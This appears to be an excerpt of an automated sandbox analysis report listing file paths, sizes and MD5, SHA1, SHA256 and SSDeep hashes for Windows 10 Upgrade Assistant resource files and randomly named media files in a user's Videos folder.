SHA1: 37b2f1086096cd4ef4886203bc6e844f0bd60619
SHA256: 5934953db4a2636a2c990d02152517610cc02339fad147a0f31159e038efb697
SSDeep: 384:3hZth+P2fxHtOn4IMmMzjdb8HU0cG470Kgs4qAFNTnufumPupPc55E5xxcnqo6Ae:R7h+AxDzjidcGkSYUNTsusY5XYqlV
False
C:\Windows10Upgrade\WinREBootApp64.exe 25.95 KB MD5: e5ba2246fa772dcde80231164cc4d341
SHA1: 2342888cbffa9c5d8d37e612c670673f133d6bad
SHA256: aac3f6c07affe427047a47924fcb43263505a3f25bcae25bc4d3641d47b47c0d
SSDeep: 384:tZ2/hNyiC4JJJMhgITmd3FgAfkfo14n7nflpgb4K1BlRFuW0m5cE2B9ooUdi0T9C:uvXJJ0Te3iA8i47n9E1BZArz9gK
False
C:\Windows10Upgrade\resources\hwcompatShared.txt 806.78 KB MD5: a316543f9fa3238aeba9c9f4e43949ee
SHA1: 5f3eca03731724ba949ec8d4dfd573794ac33cd4
SHA256: a27481eb04a82ab364b602b4929ab8fa0adeedaac2af0882c99aae31eb4b9988
SSDeep: 24576:WeDkeskfJr179KfK1btfNC9Jv08ZPmIgPDXOiT9BFyS:Ge9N9PY0mPzYeiT1
False
C:\Windows10Upgrade\resources\ux\block.png 1.66 KB MD5: 8861953a8a04290ee655f24751c1e0a5
SHA1: 037ff89b6cc891eab67ed89d32208b6f6ddb09d8
SHA256: d32606cf252f9ad0d757ac0f4bb61d6e6a0721d13bafd141797d656e8c4a85ae
SSDeep: 24:hgJ7sdeBXp+c/zrXP4yH1f+t4xlz+bCWj3RbSh91SJ/God5GLzPN/r1+JO7ad/g0:gZfHuSijlSb101KzPRr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\bluelogo.png 7.67 KB MD5: ad96e400790511a4d5652262805bb8b7
SHA1: 42735fb3399e4d0c1835bfd299d291505237da7a
SHA256: 3b4a1984d0cdabf4817a2ad2df27215ddd7fa31a17fd09ad05d795d52131ccd4
SSDeep: 192:07sCR856RqvE1TtULThA+G4ls9oufPvZYh8:Isv56RAEFyLjsK0PB9
False
C:\Windows10Upgrade\resources\ux\bullet.png 992 bytes MD5: 0533ecff7240b335da566f1e8ad0e3db
SHA1: 3500dcfb709b9350eb7cdc96558ef654c500ca2b
SHA256: 5535c315e5da8bd27fbf97a8fc3c2fc7e1b4186a17061929930562c1d1e86936
SSDeep: 24:Ae/SellmISEEqx7ut/KN/r1+JO7ad/gv6B5z67c:0eitqBu8Rr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\default.css 6.39 KB MD5: baf51b3bc12adce43ee70da962e72a28
SHA1: d2806856dd135096aea057283f6d079f7417278c
SHA256: 14083713881d930dea86fcc0f8fb0a773e2fd0122ecb830b26257a7b080bbf45
SSDeep: 96:Krip9AHQi2R6WiUt4fVma9DHIqIh1FPIDI7CAexvzXCHKAS1J+51kOT8:Kr6YQDRQDHIdFwwC7yY3+bh8
False
C:\Windows10Upgrade\resources\ux\default.htm 61.83 KB MD5: 4eb68b2237e799dc4b4808c3d2f39e0b
SHA1: 4762e1557a1b9e72f0c8be13054165b4c60a8b9a
SHA256: f82872a03807ab0ce39f65b53301274ce63c512f8da430e8fc76f2545029737e
SSDeep: 1536:SOPgYEO4fKC4CS3kQSTvpIXUCpcfcQxaJipQTRvUaZxoCvhtSW:zYYETKC4b3j8RickQxaspQTRvUcaCvt
False
C:\Windows10Upgrade\resources\ux\default_eos.css 7.30 KB MD5: e8faa5c3ef265641ca58e0fbb9113df9
SHA1: acff08636291ee8306d8c363786ea17fe61686d1
SHA256: bc7d79b4c4e8a8a238571de5d96d1786434c166f19893187bd6b6d1ede96d136
SSDeep: 192:PPzRYSPdQ0pmij4sIj7rmNmDx7KKiIpwac+cih1plq58WKxfBh8:PrRYSoijL2mkYIutInqSx8
False
C:\Windows10Upgrade\resources\ux\default_oobe.css 5.86 KB MD5: 059ee6778077a8c99a8dfbca802d126a
SHA1: ed05cccb4c1581e50fd46452d513acf1a4087432
SHA256: 7cc921eee518977e0c326f462c7155808328b02f843167e29a566dee52eb0ceb
SSDeep: 96:Sx5juEiIM1rNVqh7PCkoxAczLu7M1zQFh+jqY9HzDmX3aB1kOT8:5drNMdoxAsTuIzOX3aTh8
False
C:\Windows10Upgrade\resources\ux\default_oobe.htm 64.92 KB MD5: 59abc87d985fbda72aabb3cbad131add
SHA1: 702d11c2d042bb2cb3a522fe8012b0e0bf50d4d5
SHA256: a4db4f15c9a989bb28a23fc9f2954892cac99f654d513a43ea95cf1bdd4e642b
SSDeep: 1536:uWCyE/7JwbmTgvKRsrmFnZcRfGrUa2UBNnamJvfPdmnc:E7JgygCqKFnZWfGrUPUnamJPd
False
C:\Windows10Upgrade\resources\ux\eula.css 864 bytes MD5: c6c73c4c3d311e70de9440f6ec04cac9
SHA1: 9e5f92643edde687506c6ea9395a4bd9f11de966
SHA256: f005abcc854f5a429202e079d6b77c023efb1fa150eed308c3367c6805bcd508
SSDeep: 24:/EblfkwEILU2WNN/r1+JO7ad/gv6B5z67c:MbRTTUTNRr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\GetStarted.png 4.48 KB MD5: aec7145d5916766f3f700eb964a52e8e
SHA1: 253b81c26c2a37f01da712f5ce7932eb2fcc9d70
SHA256: 8809195352b90d83021efce96d94f33433f1afaf69414f4d9eaa172286f0e1f0
SSDeep: 96:wuKuvik3jb+mO05iObXSg2ivbG7IjKMaLSfBf3uPBoR1kOT8:wu/Z9XiAR2ivrDZviQh8
False
C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png 4.73 KB MD5: 4424e30f7aaa78e1674b923de2f2ec9d
SHA1: 2606c16aa5b8a33a9cc2bb5bdf4880fae8c743b0
SHA256: 091466a9ca3425dee58eb07a612460bea61c8f535d15bbcb35d3c732298a53d3
SSDeep: 96:PmQz4Y5rM9SKz/knZoOchPST+qQ3oGAuqAC5F1kOT8:PREYQSCtPAPiQuqA6h8
False
C:\Windows10Upgrade\resources\ux\loading.gif 17.75 KB MD5: 7079765319c3e09f20908cff91e4c7d6
SHA1: b06e76898b440ef8932a2beb5ccc2217cb2d36f5
SHA256: 2726ef1c17c2464d10f2481f090a12edd16dc12b0d8f3833ebedfb5165482873
SSDeep: 384:bYwKQZYzSXIT8F5mSbRn+NrkrXT+awxzhrSgEX2OdQzriNDV:GQZYzBEb0u+hZwdQzyDV
False
C:\Windows10Upgrade\resources\ux\lock.png 4.34 KB MD5: 81cf2c712db59c81223032269bba0cb2
SHA1: 16309eb11f09a8705803afb5836ad70af3f39d02
SHA256: 844a4aa862dcc891372d7a530858a3059cfe8e6f1c3114176b15bb12dd65fd8e
SSDeep: 96:ErOD30xjlej240oA4TG3TnQglxNlKtm3w/KfGlpoVHQ+xD1kOT8:EqD30xjlej5A4TGjQqxNlK+RJVHQ+xhe
False
C:\Windows10Upgrade\resources\ux\logo.png 3.31 KB MD5: a97ed74d683d154d204350f8168e5338
SHA1: b47337e9e20e5dae660c6d8c058c10548a283185
SHA256: f5e8c21dbaaed16e70070e41b1cacf1ae2cfe7deaf9594ee6564004745f076f9
SSDeep: 48:iUFx25rBedXYJ7XCq2BYCt7wWe+VinYhH3SqjVa4qzDQRr1kO+6zo:ilJv2BYC+We+VinYhC2k4qY1kOT8
False
C:\Windows10Upgrade\resources\ux\marketing.png 1.23 KB MD5: 141559d49968602c3ecc90811ffb13e5
SHA1: 95774aa78577f2e07d1dabd07d0a2d8e03362660
SHA256: 0406b09b8c83a3b2d84a1e0853477caccda866e0f761c841a7403d9bb3dcd9fc
SSDeep: 24:3cn4B7jRAo6GeS3F9Nh9g2A3IiPLCLswh4/N/r1+JO7ad/gv6B5z67c:3o4Bzr3XNzg2piPLW4/Rr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht 608.27 KB MD5: ad2f9a91dd52c53e9ae83bd940b95048
SHA1: 1498d3237054599b91c0844e8c407a23b790201c
SHA256: af6cabcfc968be7c0367b1a88a5aa92bdfc10a78ccb0941881a6bde4cd358882
SSDeep: 12288:rusaxZrFa8wjNb3af28VDKmh4CztWPHrdIEXdqsnQ4eXSB9qh9D:vax63j9au8cmhVUrSEXdqsLVBQhF
False
C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png 2.88 KB MD5: 60966ba4663e5e04005acf10ca506906
SHA1: 38d8d9b66e75e081cbc395bc0f06fc744f88f4f3
SHA256: c681d164f1644d32362bdcd7d89ee6322467c1f1c64b718907aed1ebc42615a9
SSDeep: 48:7K5oQ44FoiUsq53QOtPll8gdWVYGjUywXR/ozfP/QCti0vIeahoQPoZRr1kO+6zo:FQ3bqfx8E1VR/orP/ZtTQGQP+1kOT8
False
C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png 2.92 KB MD5: 711a144ab5c5e891282b60611705c84a
SHA1: 7ade146eaff2efff45abf53199858e7bbf5a0a9b
SHA256: d6cc3cb5b4cb21ffa37b67e95ede5d64064cefe9c4e172673452c2fd275bea64
SSDeep: 48:95PIGGK3vX1G3Sy4OrlJTUGbJxxgxBOloHhQ/O6pJV5Nk+hwEz+SWouRxRr1kO+R:9asfsiXOXTFZgxDh8OaJVXvh/CSgRn1e
False
C:\Windows10Upgrade\resources\ux\pass.png 2.53 KB MD5: bcc1f89444d56a9f9d68acf1d8902e46
SHA1: 672c9e0365fbe159eea75abe800c1aed6a435fcb
SHA256: 20e0b119812ebefc0d8438775b6dda95a6e77566f34e3e4ca36b6a0cb6ef9ab1
SSDeep: 48:1Qv02mYvVl78ZbCJANCs7H51gNBAI0sdBt0Rr1kO+6zo:NYv71Ar7H51gPHdBtE1kOT8
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css 40.75 KB MD5: fd06bfac9547c90b39e181a191595664
SHA1: 8535e88c11ec7fedac3a47a0d22990be3a4cd439
SHA256: ce6f86026fded45138b40058cb28a5dd53d4ec6e40f28896dcc58cc555065914
SSDeep: 768:caHc5p9kUQ2RKh9g2tMrfBv145Llq2W7MzyxihyhJgPtaHE:cScj9kUQySx+r5vWvq2v+xihyJbHE
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css 263.61 KB MD5: a4e17466b2f25a4ed1700919b3fa9423
SHA1: 36916d8d3ebe57670230b7233617b68863622e15
SHA256: 8682e98bdeba9313f7c4c2aa5d3dd6778721ca7b59bd32ba463fdd6826c69224
SSDeep: 6144:khuHPnNup9dgiPaseh0J0VXqLZqVJ3hIO0qK1TvB+LeVWHFY:khuH/ugiSsehGiXqwV7IhB5BieolY
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm 248.27 KB MD5: fe669f20f8bf3f1d206f2584e6e18166
SHA1: 6fed1437280339e67fe19959c7c760c1424fe966
SHA256: beb1589206e39d6a561a2a8e6aabbc01dd8cd76bd61f62f2e1547b3ddb7e2765
SSDeep: 3072:lXIxUwUHvZ/5f4DWa5EdUtv/5wv0yox8/PU/JTZWCLDT+WpASgxlaL+VFFbbxIDy:lXIvUPZ/cWa5EUtjcPoLL+igA+jdH+M
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm 82.12 KB MD5: fc86de97b9e7df2bcbb58e1c99c1b853
SHA1: 38814abd86380cea0ad61602c5587a4f19f34c14
SHA256: 27f73ecc4a8b326006708a9a784774beb2a3d616ac88099b872fd0507845d1e9
SSDeep: 1536:fUpUdXBwJThDbRzX7lJzUL0WtSwc/5g+ZqGu7OXNte1PpP3R9FTCx31aEiXC:fUpYBKhVX7kL0Wtp25g+A37OdsPm3eC
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm 64.41 KB MD5: 9191b971d4689842cb4d89019afa8068
SHA1: 3882742b21bd260c7e90d61c96174ae32ead9c9e
SHA256: f6f84b09b61d5d54e75a916beda1445e0cc2586bf09565d3c8c697c8896982d1
SSDeep: 1536:5CmspWVsxzCITFe8lTkBaV/vUJ04i13WEWU8AOY9RdHD4GI4Z0D:56MVs9CIYWkoV/824iJWlY9RtDfGD
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm 234.59 KB MD5: 2b197e75d6746a2194772f9295d097fc
SHA1: f026a4bccbc11a97c780c72cdf400e5588f385d9
SHA256: ca0dc3c7b1b85b898b042f66703d17bf146ba66b1eaa4a6e90dbe9a8684708cc
SSDeep: 6144:1uRHxaAiyXChFF4RzrmanyJi+vuJ4UuTj4:1uRRvm4hqamGJJuH4
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm 57.94 KB MD5: 546a61666dadcea933df2b2b15d4d9ca
SHA1: 02d310fb090ba03852fc719cc86e059b2674009e
SHA256: ac61971e29a5e7a8c4fd696c66d87630caad545905c119ed133bc27cfd252879
SSDeep: 1536:qtxIJFKABKdfsKBqbkSowc1OLqJJujJf+cJSZO9BYkgqx:qtxHAgDSe1OLqJwj9Ffnh
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm 68.94 KB MD5: 4c29331813706b6a610900c61e02a955
SHA1: 7b53833fec29b5e534dc8a972929e621cf2a2c02
SHA256: 3851f722506c8776f0b662a332c5dcc7b0c53965537b8deb4c31cf4d6668ad5a
SSDeep: 1536:YSPU5WgkeO84/jSW1RNlQgan7S21gGcQMe3s66blvrxg2/:YS8EgqDVQ7p1aQM7FTx/
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm 64.11 KB MD5: 4ebcd837462910a0f18b51bcf3b28732
SHA1: d81e6f83bf1287b64171b2b6b56957f498e6df36
SHA256: c56994c58d098acdb28e50a9c55fe27598a43312885a0aa1c3161e5925cb2bdb
SSDeep: 1536:Z/3pIQ7u4EwD7qHwWz695NPkvbOYhRwjujaeXYR11hTO:Z/5IQ8wDNe695NczLfdrof1h6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm 619.98 KB MD5: fd442eb55ade90a0acd187565653fec7
SHA1: e9e3fb12e6179acd054895586e6e29526a694891
SHA256: 0521ea9b4d319d9b0511221c28a8908afe70b59df4418fe523da71e0273b6099
SSDeep: 12288:Ajd5ct7BmW6XfpFbRRX6E8jcGj8vWAqJF3jl+/ud0VqLGejoos5Z6:JzmWWBzdrG4vWAqLx+mUXZ6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm 75.06 KB MD5: d293af0c2a77214cc77d94863cba6107
SHA1: e367755def8752c279c06fb07f85e4ad9a07220b
SHA256: 6eef81f9be81a00baf5fbeed3c7fc8172c4151d8e449f2da25576301f7a609a4
SSDeep: 1536:WOAZIo4i2031Bu6bcEVeNrEIFcwwKvKNY8rWGjVjzqf7bWYLkNMqReTKh+cB:WnhFs6bckeNrbcJKLG9U7bWYLkNMceGX
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm 66.41 KB MD5: 5a09d1cf3ec4903448b6f41594d752d5
SHA1: 73ae04fbd5f3ae7561508fff4c5d154172fe6370
SHA256: 370824cde1537c33b8a8a7abb60436c826624cd4b2a7e911729c281cb38ec218
SSDeep: 1536:uQX45K0F/HBbe2ORpdz9D+p1/7ad7ysXpomLa3ZUTxL:nX4MIq2eQ747ysX2mYZUTZ
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm 67.45 KB MD5: 695e95355182d8a92c14052c697fc6be
SHA1: 922a62f5b1a0c950dad1542b0792776ee8201985
SHA256: d5fa67abcd5ec0fa136d7f83f6e7d00ed9d963f34658a4ee5308084d36ed98e5
SSDeep: 1536:IzF4eTKBiZINgkM/1iYHfHjjZaVzqnfUbO6TK/o/kl6+:64YuN1M/1iEDlaVzOfUbO6Eo/kI+
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm 77.09 KB MD5: 8830357926760c4305c1cbce576ce38b
SHA1: 36379ffbcba006a6e017106e3f17dec41c49b652
SHA256: f2cae076566e6b309e9c5000014179457e733895384c02100d96c6a4e5f6f368
SSDeep: 1536:mlXT5RLZ6VG4stRmnynGqsMgKHtt9+Qh1JP03p2E/cGcPAzYD4P:KXvZ6VG4stRJnGqfHtt9jG3po1Dg
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm 277.95 KB MD5: 42daac92a6ba6926f632dce9c9eb6442
SHA1: 59d66fea6f72440df600aa0f633752b95e8e6f2f
SHA256: 5167b5ab54159e61df7796537c1ce9e8df41d8f4796e1155f4e641a432041ad3
SSDeep: 6144:EjDyGwWxcABgOJ7/wdCkPuvqFEnGED0I8mnwU7QLPxS:+DyRYcUnJ7/w4UhEnBII8E7QlS
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm 80.80 KB MD5: 3ff0993a2c9fd710ec5a487572f43c94
SHA1: dad6cb6abb0e02158078512522ec0ed57339878f
SHA256: cdc04a621e63b893c83546a4b8f52607729cf2dd411f83b1da355b476a244643
SSDeep: 1536:xYNF2HwbXce4f07RZOlwcnKkSUSxDZbTTAHmGiJy8yBdTjp1p1:xYNcHoseECRklC+IhkHmG6yBBtj1
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm 65.36 KB MD5: e55fcc4667093d720cd544bf357f547e
SHA1: 074442457d149c8ff159d5591cacfcfbb48b9628
SHA256: 131d62ec1806ead06392cd482b7a9ed742898ab4356446ad76b6d9d12db5d754
SSDeep: 1536:OD1RUBn+qCmfyynClyRZqtezvX2iOV8xfp/5zmO3ACw:BBn+qCmfyyClSZ5zvX2iOixfpBwCw
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm 74.53 KB MD5: 10b5b7969a84c98e23b755b4ac802ac9
SHA1: 0e7550283bcdd2f5183c9c2b982c8f107c98ae04
SHA256: 339a78f79a125e040ef10fcd54613686998e4a358e4b8c78c618914c552ec212
SSDeep: 1536:kOxgl24BdJOM1rckERTzN5CwUiO0S0AZEc+nIhhk81NPY7F0:kK3EFrgTZAZ0DAGlIhD1Ny0
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm 69.50 KB MD5: 61da5304dc10d80e5e4879decb7e0835
SHA1: 539f81fcd76983b753b4f90c2d1132f5cc373719
SHA256: 2d8c30b9fd242f7fe2c4ac0b3374efd5c63f6ef0592274297ccc0b954ec5d58d
SSDeep: 1536:Ok3ii/rKlqkbOAwXd+IIhnCqoWuGrOupkYtYdMX3gQPekMYIhcb1U:x3iGkSAsoI2nCqVuknrBX3FvIr
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm 74.14 KB MD5: b5927b08173f3244a452257a4a4b78ec
SHA1: 75274cd497dbd26e792bf558678dc96dd5a6b6ff
SHA256: 16d26f67f37a96aa6641a9e6ad1a6d059c0bfb8921e73b7bba0f3849b03031e3
SSDeep: 1536:goeBmCIqy79HGiw8XjZCyBjZjK71DDoPCGdn+M0JOK8uwDAw5unUlT2:YIPHGitDjtK75DGzDruUl6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm 261.23 KB MD5: 8cf1e85cbe9b36d02f12e73883980ed3
SHA1: 55d89c21e4782db7823730cae9d95fea4c2af6d2
SHA256: b7f3d4815ec75fdab5789f14b7fdf38a50064d95d754812d4e68bbdd94fee6d8
SSDeep: 6144:e8hYB44LJORoJXzl3/kpV+WEj3L9NBH5Zbl5xyF5lplx:eSYWSJ8oJXzl3/kpuNjH5Zbl5K
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm 124.05 KB MD5: d1ebafabbd6a5a90e34d574b72c899b3
SHA1: b9a6811b559eb0e3aeaa984efb4cc33284b2caa9
SHA256: 72cc909f4e6f71847b3d2b8808ad682330ff5b9fdf6d5613474767a3b5a49b09
SSDeep: 3072:6eOaoyQiTe3qdCxPS05gmgJMOzvXnqaDGx:6epHQLxakgmgZzvXqp
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm 144.45 KB MD5: 156a5319d08eab38cd04add78460e732
SHA1: d64d2444844388beea34623b55ec716f4a77228a
SHA256: bde2e9280fae2127d7f199edb1757d3565218a045f90ae5118540534d5d4f022
SSDeep: 3072:bHWjs3tLEh+GsOnjDRpTKKyGg6pdNNvT51ytgKqkJXBhVSb2MnJBG5ZsztR/1TN:jGOtQhrTWGgOvNoZqMb0bBJMZsJx
False
C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml 92.44 KB MD5: 3f12a3ca0571768b80996a1d3a81dec4
SHA1: 887d06506e3654ad0bb93f28944ddc30a98bbc88
SHA256: f20da7b922f2c27d480863afc99c2f7bf294201158660b36f85525462ea7ce9e
SSDeep: 1536:yxNZbm2/RWrOWBufVXCLR47TgJawJgry8Y4K0BY61m1R88PAD6TJl7HGkZgWMDY3:yVmQRdZkMgaw+ry828Y/v8VwJ9GFLDY3
False
C:\Windows10Upgrade\resources\amd64\hwcompat.txt 72.17 KB MD5: 9a95f8e54676739fedfc6bd2d5feef8c
SHA1: 032a972a2bfe0c5ef483f5c613355014d6e2b85d
SHA256: 8497930c91efe672a59d10a644e75edd41cafa680689fc28add49b864447d7eb
SSDeep: 1536:wsb3n0gitIN+MN8TtRlwahw3hUQrnvvI5UFQzPPbq0+Rs/wB6Bc/:wsb3nVihMN8TtRLhw3hUUvvgUUnbqWwX
False
C:\Windows10Upgrade\resources\amd64\hwexclude.txt 3.02 KB MD5: 25cbc44fe6165781e0ebe73e9832886e
SHA1: 1fc6bd7617aa7dc362e5ab6c86b74080f52482ce
SHA256: d64848bf4b7db9dc698a88eff59dff92213e7d0ac936613d84b5708722210d25
SSDeep: 48:af3z8+5EZx1dUgRD0pCMBw5yMR7jMmBgIc4tpfPpktjp4PslJDTxRr1kO+6zo:afjNAB7x00JR7jMm6Icgktj6P6l1kOT8
False
C:\Windows10Upgrade\resources\amd64\nxquery.cat 10.44 KB MD5: 0aada64e1950c4ea2235f5235e91ecae
SHA1: 6727cde8146f479d66fe30d5ad8b09401347be8b
SHA256: cfd8980f79d81f01c8e2f8f1a9c6bb1734264a1732f3838d618fe7e93702d7d2
SSDeep: 192:ipoFqMhLbm2l3UJKol/p8IinHa+pw5Rkj2UQp2xdKogZh8:iOIaLbd20opp8Jnnw5ij2i7KM
False
C:\Windows10Upgrade\resources\amd64\nxquery.inf 2.22 KB MD5: d4e8f344f117b1f624fe3574788040ea
SHA1: 46a5f3d34f2af75952e8a3585536428a6d49087e
SHA256: 2d49bd18bc90147ced335fffd7e44460768207690b57141cc4f36763f690bc07
SSDeep: 48:WpPIITMKHw9RN8lK0nIyknG/99b6twJfqaOwCiRr1kO+6zo:WpPNMKH8O8Kp6vaOzq1kOT8
False
C:\Users\Public\Libraries\RecordedTV.library-ms 1.69 KB MD5: a0e1c73f8bb341dc916c27b648134a0b
SHA1: 3b3cc673a04b37cfcb86d7664e2a615e515117b0
SHA256: 2d4e3eaf84db69239f58e5bf6a6ab889e50d76407b0ef7e0fb532636f7b5cabb
SSDeep: 48:E1q2Fyy4zGehEV8LUexT+pElsxv8rRr1kO+6zo:Zy4i8FxsgsWp1kOT8
False
C:\Users\FD1HVy\Videos\2NnCc4KzPlFvi.swf 2.34 KB MD5: 3f956870f4a63d9e08868d07a7e5eb94
SHA1: d9d27d28bfb1b7bc011a19c6ba6e1d6392275742
SHA256: 0068771ff156e47e1bf97129622ad69b51a08bb9fd65ab728297915d8329cd1a
SSDeep: 48:uQdxGoupi8bPTA6lYbphQRNgbOo3HWoqIsOq4xGA4D9Rr1kO+6zo:+pt1YfogbOcHtqLGT41kOT8
False
C:\Users\FD1HVy\Videos\5K6QHDJbfIWjYG262dir.avi 71.47 KB MD5: 6c161f81eb6c42d37e4335cc1da026ad
SHA1: 4cd22d1a9b3e0b224822d032bd7d42c1153eb53e
SHA256: 8252a67d52f88e72594bc1c5e2a13f33b83676e3bb3de85dd11c05950b390ba5
SSDeep: 1536:j89GiHDv11lUtd3Nfa5cC7LAAblS3cbMqotpoP+SPt8NH7:j0GKT9S3NfLC7LdlS3cQqRt8N7
False
C:\Users\FD1HVy\Videos\ccn85Ai_.mp4 81.08 KB MD5: 2558b188b0cf79b7fbaec2b2ff0b8ada
SHA1: 9691fb675bd47c53fde6ceaa1a146aa54feb283f
SHA256: f3d94f71e3dfe4fe6f7172ae93a29f9333406fc2835441418717e5d8190a710d
SSDeep: 1536:k/595+ogXfsYxSLpHL3Csb33syKj5EnoNso8uBo32QJWeDxhL9if:Y5JJOSLpHLSsb38lq3uvQJWQLQf
False
C:\Users\FD1HVy\Videos\nZxJYVmIXHGhm.flv 26.67 KB MD5: e22bfa3f88c3300864d8fd55ab4eff06
SHA1: 9c960f94c3c7709e9df3672bb96a63822c49982d
SHA256: 5d4096503ba3353d02e58950cf004e55b613e1011c4ea44238aee9d23ee3687c
SSDeep: 768:Lccr7IEPHgWnx0jqf6Ra/AWcqF6m5/GmbQYfm:LvAWJUdqFh/m
False
C:\Users\FD1HVy\Videos\ofQy-RjpJsOl2h.avi 23.06 KB MD5: a1e7b2803f7733acc8d87ae0948eeaa0
SHA1: 349228cc72b58e450a446fd522e6bf2a3aed1288
SHA256: 01ac107db45241afefcdd4cf297c394307d58ab73d474617732c07e623a7523e
SSDeep: 384:A7x0GPr1WnV6Lphe0oQiWTu0U1B2KVlYQrXXV+4p3yQQfboRI:4x0crMEpiD0UuelHXve4I
False
C:\Users\FD1HVy\Videos\s9NfPDdsE6nhezSDza.flv 97.98 KB MD5: 957041e787ca40d253f031b02939f7dc
SHA1: 4517cb872c2bf5bf1f199a0c8377b909820f3a0e
SHA256: ade8c37a49259daf5116e154dc846b6a45c65bd3abd8282af4e41a54ea2598d5
SSDeep: 3072:KurE046v+XzmAQAz3xjMDK3C2AZeumY9VQ2tv:/rE0B26i9gK3XQe4ltv
False
C:\Users\FD1HVy\Videos\XZJL mjrH9\b70zp1nV4_RX.flv 57.25 KB MD5: 4f8eba35db270219ce90a22b0693742c
SHA1: 336134dfef86ce9b6baa82b6e225acf936759646
SHA256: 578d80010daceab9b82e3a846ac4250fbb90227b973b86ec38a01940f6feb384
SSDeep: 1536:LEluA1rhtdZJvn8Sz00XjXWnH/VXdrvqhdM22r3OHR1TRx4+14blX0:LUumZJ9AujURdG4hrMDETblX0
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\9v2jkjY15yj.mp4 61.50 KB MD5: 3cdf40ccf8b5c5a2169bf114ef38d8de
SHA1: 094f5de6e45411e30a8e1d490ae6ed30e35c1fe5
SHA256: 518966e9eae60909919774ed52ab21cec3de11713b2237c37cbefb4c04739af4
SSDeep: 1536:Aim1ISd4xPJQ2XopIKTt+6rmTN9s4Y7IYs3ziI:BSyxK2XouKRr0N9s4Y7Vid
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Aksfbq.flv 38.06 KB MD5: 4fc9abd12b0f77fe283f55bce2e91cdf
SHA1: a71c218cef61e6ab3b57cbc25cf1bf273acd4c24
SHA256: 4c1b603e2f7fb639db6c10cb84418fb6892ae863a20048f8ca295dc4a46e15cc
SSDeep: 768:ZAQ4u6C3URyCupwVWbj6ejsgVj55cXDdTZPwsVuz0Pkzm/cbEuaE1Ml80M6beo:GJu65MBwVuTjz5ejwsVuzmk6/4EX
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\CokPtPcir1Km9h.swf 91.94 KB MD5: 4788670db952001a00cbaa4e4a9b8236
SHA1: c5a6034acc0431f452571b2ccef9c76b254f836d
SHA256: 9cf9964b8f5c3418c79f6d7aeb93af2e589ad0b7ab1cc08ced8accc6b0720a6c
SSDeep: 1536:gHAmrDvXig6LBmUB7mzaHkvf2VcbZORzwHiWPjgnQd1ppclr2MZlFltt4beFQI5S:gwLByaEH2+mwT0waCMxlttgi0
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\FFQYJepVdSMrceUSp.flv 92.08 KB MD5: ab5034613d59675588314a76d6ee7f07
SHA1: 46e3efc6ad60e968bee136944d0057fd4ddbcbff
SHA256: d1522dba72740296e662136eb2c4a50a697a269486184c2a7dd8695ab208b6a2
SSDeep: 1536:D8nMUbA8TcdQ/E5raz+hhboLUhJobhYNT/71o0oYmqJS/RJP+B+d0Lgr:D8Mvs3E5+e5cUheaponNPM+/
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\JKXNIWeQxs8Bq.swf 12.12 KB MD5: a4491104e9317aaf8eaddcc4747e2274
SHA1: 264ccdf5e76483bd9308de7891e94c1be780ce84
SHA256: 302e4cfc318dc3756c85a4c2826bb69b870ca908564c2f7510ade36931fe1f0d
SSDeep: 192:/C+cgjE48GuiqRBBE+nS8SUYP6M/6duyg+3OGzh8:/CFp4895wr9/Cuyg+9S
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\NfDZ9FmKUznX7QjqQB0.flv 75.56 KB MD5: bbf1d3613cbe8d46efa81170b0a31b4d
SHA1: 5925b3102315a56d4cf3d302d6d5ee46285fa797
SHA256: a1c3d915400ad738d2b919d51f7542bd17153c9f40da6adb3dc3d8ba716da3ae
SSDeep: 1536:ZGf6uXSPGy3mTVCxFx5hn5gVmZIUeCJABzQzjnl08a/QYGMfuA42Xz5N:ZGfBdy3mTVQFx/n5g0PeCedQ1ra/DJum
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\OKe9Vwu AXHg.avi 3.31 KB MD5: 9068404ec2d02e85b2922d2a2d492d5a
SHA1: d45e540f12593e7616d00ba544091a9b4d082da5
SHA256: 7b193a55d0dbc114ef94ce49091d4417f9ae01a5fb4cad5f1e6b0bc73794017a
SSDeep: 96:2lL6L3TWoo+LVVEmnfdbfaHPE0/m1kOT8:2lqjDV6E0Sh8
False
